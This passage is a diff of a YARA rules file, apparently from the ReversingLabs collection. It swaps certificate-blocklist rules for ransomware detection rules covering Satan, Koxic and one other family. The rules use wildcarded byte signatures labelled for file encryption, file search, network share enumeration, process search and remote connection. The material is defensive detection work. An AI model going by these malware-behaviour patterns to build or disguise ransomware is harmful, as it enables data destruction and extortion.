+            ?? ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 FF 85 C0 7E ?? 8D
+            5F ?? 8D 44 24 ?? 50 FF 34 BD ?? ?? ?? ?? FF D5 85 C0 0F 44 F3 47 3B 3D ?? ?? ?? ??
+            7C ?? 8B 5C 24 ?? 85 F6 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0D ?? ??
+            ?? ?? 8B 3D ?? ?? ?? ?? 89 04 8D ?? ?? ?? ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 50 FF D7
+            A1 ?? ?? ?? ?? 83 C4 ?? 8D 04 85 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 6A ?? FF 34 85 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 04 8D ?? ??
+            ?? ?? 41 FF 05 ?? ?? ?? ?? 89 0D ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 8B 74 24 ?? 83
+            C3 ?? 46 89 5C 24 ?? 89 74 24 ?? 3B 74 24 ?? 0F 82 ?? ?? ?? ?? 8B 5C 24 ?? 53 FF 15
+            ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 0F 84 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4
+            ?? ?? ?? ?? C3
+        }
+		$encrypt_files = {
+            68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ?? ??
+            ?? ?? FF D0 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B F0 E8 ?? ?? ?? ??
+            83 C4 ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83
+            C4 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D
+            04 45 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ??
+            FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 83 FB ?? 75 ?? E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? 6A ?? 6A ?? 68 ?? ?? ?? ??
+            56 6A ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 E8 ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? 51 E8 ?? ?? ??
+            ?? 83 C4 ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8
+        }
+		$find_files = {
+            81 EC ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 8D 51 ?? 66 8B 01
+            83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ?? ?? 56 8D 71 ?? 0F 85 ?? ?? ?? ??
+            55 8B 2D ?? ?? ?? ?? 57 8B 3D ?? ?? ?? ?? 66 90 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ??
+            66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 66 83 7C 74
+            ?? ?? 0F 85 ?? ?? ?? ?? 33 C0 66 89 44 74 ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
+            8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4C 74 ?? 85 C0 74 ?? 33 F6 90
+            FF 34 B5 ?? ?? ?? ?? FF D7 83 F8 ?? 74 ?? 46 83 FE ?? 72 ?? 8D 44 24 ?? 50 FF 34 B5
+            ?? ?? ?? ?? FF D5 68 ?? ?? ?? ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D
+            4C 24 ?? 8D 51 ?? 66 90 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 66 83 7C 24 ??
+            ?? 8D 71 ?? 0F 84 ?? ?? ?? ?? 5F 5D 53 FF 15 ?? ?? ?? ?? 5E 5B 81 C4 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "isonet ag" and pe.signatures [ i ] . serial == "75:a3:85:07:bf:40:3b:15:21:25:b8:f5:ce:1b:97:ad" and 1395359999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $enum_shares_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Effa8B216E24B16202940C1Bc2Fa8A5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Satan : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Satan ransomware."
 		author = "ReversingLabs"
-		id = "541a169e-a263-5901-9d8e-768306b8b8ba"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "7ec379d8-172c-52ee-9284-6898dd446468"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L189-L205"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Satan.yara#L1-L152"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "b5282fc85bbbee50c5307fff923e9e477fed8c011288e2ebd61c4b3ee801bc62"
+		logic_hash = "0074090c2a6cc483deffdc83dc1c0bfbd150e201c27e54f998dd2c0a7660f917"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Satan"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83
+            C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? FF B5 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F0 6A ??
+            6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 56 FF D3 8B 3D ?? ?? ?? ?? 6A ?? 56 FF D7 8D 45 ?? 50
+            8D 45 ?? 50 8D 45 ?? 50 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 50 89 85 ?? ?? ??
+            ?? FF D3 8B 9D ?? ?? ?? ?? 6A ?? 53 FF D7 68 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 83 C4
+            ?? 8B F0 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? 39 7D ?? 76 ?? 68 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 6A ?? 51 50
+            56 FF B5 ?? ?? ?? ?? 03 F8 FF 15 ?? ?? ?? ?? 39 7D ?? 77 ?? 8B 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 53 FF D6 FF B5 ??
+            ?? ?? ?? FF D6 FF B5 ?? ?? ?? ?? FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$search_processes = {
+            6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 51 50
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 0F 1F
+            44 00 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 8B 4C B5 ??
+            8D 85 ?? ?? ?? ?? 0F 1F 44 00 ?? 8A 11 3A 10 75 ?? 84 D2 74 ?? 8A 51 ?? 3A 50 ?? 75
+            ?? 83 C1 ?? 83 C0 ?? 84 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 75 ?? FF B5 ?? ??
+            ?? ?? 50 68 ?? ?? ?? ?? FF D7 6A ?? 50 FF D3 46 83 FE ?? 76 ?? 8D 85 ?? ?? ?? ?? 50
+            FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B
+            E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ??
+            ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 8B 4D
+            ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 83 CB ?? 89
+            5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 F6 89 75 ?? 89 75 ?? 56 68 ?? ??
+            ?? ?? 6A ?? 56 6A ?? 6A ?? 51 8B 3D ?? ?? ?? ?? FF D7 89 45 ?? 3B C3 0F 84 ?? ?? ??
+            ?? 56 68 ?? ?? ?? ?? 6A ?? 56 6A ?? 6A ?? FF 75 ?? FF D7 8B D8 89 5D ?? 83 FB ?? 0F
+            84 ?? ?? ?? ?? 8B 7D ?? 8B 07 85 C0 0F 84 ?? ?? ?? ?? 8D 4D ?? 51 56 56 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF
+            75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ??
+            FF 75 ?? 68 ?? ?? ?? ?? FF 37 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 32 C0 89 45 ?? 88
+            45 ?? 33 FF 89 7D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 0F B6 C0 81 7D ?? ?? ?? ?? ??
+            B9 ?? ?? ?? ?? 0F 42 C1 89 45 ?? 88 45 ?? 68 ?? ?? ?? ?? 8D 4D ?? 51 56 6A ?? 0F B6
+            C0 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 85 FF 75 ?? 57 8D 45 ?? 50 68 ??
+            ?? ?? ?? FF 35 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 47 89 7D ?? 8B 45 ?? 84 C0 0F 84 ?? ?? ?? ?? 80 7D ?? ??
+            74 ?? 83 05 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8A 45 ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$search_files_in_specific_folders_p1 = {
+            51 8D 85 ?? ?? ?? ?? 8B CE 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F0 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 FF
+        }
+		$search_files_in_specific_folders_p2 = {
+            75 ?? FF 75 ?? 8D 55 ?? 8B CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85
+            F6 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 FF ?? 0F 85 ?? ?? ?? ?? FF 75 ?? 8D 55 ?? 8B
+            CB 57 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 0F 85 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41
+            84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 6A ?? 83 EC ?? 8D
+            4D ?? E8 ?? ?? ?? ?? 6A ?? 40 8D 4D ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0
+            8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            EC ?? C6 45 ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83
+            EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50
+            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 84
+            C0 8D 8D ?? ?? ?? ?? 0F 94 C3 EB ?? 83 FF ?? 75 ?? 8B 8D ?? ?? ?? ?? 8D 45 ?? 50 8D
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 8A D8
+        }
+		$search_files_in_specific_folders_p3 = {
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 DB 8B 9D ?? ?? ?? ?? 74 ?? 8D 45 ??
+            8B CB 50 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? 33 F6 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF B5 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
+            E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 6A ?? 50 FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ??
+            ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Henan Maijiamai Technology Co., Ltd." and pe.signatures [ i ] . serial == "4e:ff:a8:b2:16:e2:4b:16:20:29:40:c1:bc:2f:a8:a5" and 1404691199 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_processes and ( all of ( $search_files_in_specific_folders_p* ) ) and $encrypt_files and $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_57D7153A89Bbf4729Be87F3C927043Aa : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Koxic : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Koxic ransomware."
 		author = "ReversingLabs"
-		id = "9b778a20-8a0c-5c9f-8cc3-9e5054713e13"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "73c4afb0-cfa8-5bc5-bca3-49a7710f4ab9"
+		date = "2022-04-21"
+		modified = "2022-04-21"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L207-L223"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Koxic.yara#L1-L87"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a8de7951bd25c8a9346ef341d8bf9c9147f9fa6913e952be40fb43d3d7a370c1"
+		logic_hash = "739faf047b95fd538422a42943fcaad6538549bf4cf33ed91385c61365af4f09"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Koxic"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$enum_shares_p1 = {
+            8B 45 ?? 50 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 55 ?? 52 8B 45 ?? 50 8D 4D
+            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B
+            55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? C1
+            E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? 8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 8B
+        }
+		$enum_shares_p2 = {
+            54 01 ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ??
+            0F B6 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 83 E8 ?? 89 45 ?? EB ?? 8B 55 ?? 83 EA ?? 89 55 ?? 83 7D ?? ??
+            0F 8C ?? ?? ?? ?? 8B 45 ?? 0F B7 8C 45 ?? ?? ?? ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8B 55
+            ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? C6 45 ?? ?? EB ?? 8B 4D ?? 8D 94 4D ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C9 8B 55 ?? 66 89 8C 55 ?? ?? FF
+            FF 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85
